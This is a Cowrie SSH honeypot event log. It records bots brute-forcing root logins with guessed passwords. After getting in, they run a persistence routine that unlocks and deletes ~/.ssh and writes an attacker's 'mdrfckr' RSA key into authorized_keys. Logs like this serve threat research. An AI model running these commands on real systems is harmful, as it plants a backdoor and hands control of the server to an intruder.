{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:24:15.844213Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.login.success","username":"root","password":"1234aA","message":"login attempt [root/1234aA] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:24:16.731648Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:24:17.215396Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:24:17.216102Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:24:17.216863Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:17.430613Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:24:17.866593Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:24:17.867272Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:24:18.078851Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:18.079878Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.54.167","src_port":39848,"dst_ip":"1.2.3.4","dst_port":22,"session":"73e87877d593","protocol":"ssh","message":"New connection: 101.126.54.167:39848 (1.2.3.4:22) [session: 73e87877d593]","sensor":"my-vps","timestamp":"2025-08-24T23:24:18.276457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:24:18.277175Z","src_ip":"101.126.54.167","session":"73e87877d593"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:24:18.485305Z","src_ip":"101.126.54.167","session":"73e87877d593"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:24:19.360657Z","src_ip":"101.126.54.167","session":"73e87877d593"}
{"eventid":"cowrie.session.connect","src_ip":"189.151.79.208","src_port":49500,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ae072320fa2","protocol":"ssh","message":"New connection: 189.151.79.208:49500 (1.2.3.4:22) [session: 2ae072320fa2]","sensor":"my-vps","timestamp":"2025-08-24T23:24:19.558015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:24:19.559061Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:24:19.758600Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:20.570196Z","src_ip":"101.126.54.167","session":"73e87877d593"}
{"eventid":"cowrie.login.success","username":"root","password":"krakow","message":"login attempt [root/krakow] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:24:20.596184Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.54.167","src_port":39860,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e4d6267960c","protocol":"ssh","message":"New connection: 101.126.54.167:39860 (1.2.3.4:22) [session: 2e4d6267960c]","sensor":"my-vps","timestamp":"2025-08-24T23:24:20.797172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:24:20.799008Z","src_ip":"101.126.54.167","session":"2e4d6267960c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:24:21.048532Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.049213Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.049998Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.051163Z","src_ip":"101.126.54.167","session":"2e4d6267960c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.250330Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:24:21.725547Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.726245Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.927217Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.928093Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:24:21.946357Z","src_ip":"101.126.54.167","session":"2e4d6267960c"}
{"eventid":"cowrie.session.connect","src_ip":"189.151.79.208","src_port":49502,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c17bf6ad3e4","protocol":"ssh","message":"New connection: 189.151.79.208:49502 (1.2.3.4:22) [session: 7c17bf6ad3e4]","sensor":"my-vps","timestamp":"2025-08-24T23:24:22.084263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:24:22.085504Z","src_ip":"189.151.79.208","session":"7c17bf6ad3e4"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:22.165789Z","src_ip":"101.126.54.167","session":"cf514685ada1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:22.167124Z","src_ip":"101.126.54.167","session":"2e4d6267960c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:24:22.255702Z","src_ip":"189.151.79.208","session":"7c17bf6ad3e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:24:22.979718Z","src_ip":"189.151.79.208","session":"7c17bf6ad3e4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:24.152735Z","src_ip":"189.151.79.208","session":"7c17bf6ad3e4"}
{"eventid":"cowrie.session.connect","src_ip":"120.79.98.154","src_port":55722,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f575f452562","protocol":"ssh","message":"New connection: 120.79.98.154:55722 (1.2.3.4:22) [session: 4f575f452562]","sensor":"my-vps","timestamp":"2025-08-24T23:24:24.235627Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:24:24.237653Z","src_ip":"120.79.98.154","session":"4f575f452562"}
{"eventid":"cowrie.session.connect","src_ip":"189.151.79.208","src_port":51664,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d0f35822de6","protocol":"ssh","message":"New connection: 189.151.79.208:51664 (1.2.3.4:22) [session: 3d0f35822de6]","sensor":"my-vps","timestamp":"2025-08-24T23:24:24.351820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:24:24.352810Z","src_ip":"189.151.79.208","session":"3d0f35822de6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:24:24.538895Z","src_ip":"189.151.79.208","session":"3d0f35822de6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:24:25.325912Z","src_ip":"189.151.79.208","session":"3d0f35822de6"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:25.512825Z","src_ip":"189.151.79.208","session":"2ae072320fa2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:24:25.513834Z","src_ip":"189.151.79.208","session":"3d0f35822de6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-24T23:24:27.036543Z","src_ip":"120.79.98.154","session":"4f575f452562"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36248,"dst_ip":"1.2.3.4","dst_port":22,"session":"9643be49e244","protocol":"ssh","message":"New connection: 196.251.115.108:36248 (1.2.3.4:22) [session: 9643be49e244]","sensor":"my-vps","timestamp":"2025-08-24T23:24:28.170537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:24:28.842122Z","src_ip":"196.251.115.108","session":"9643be49e244"}
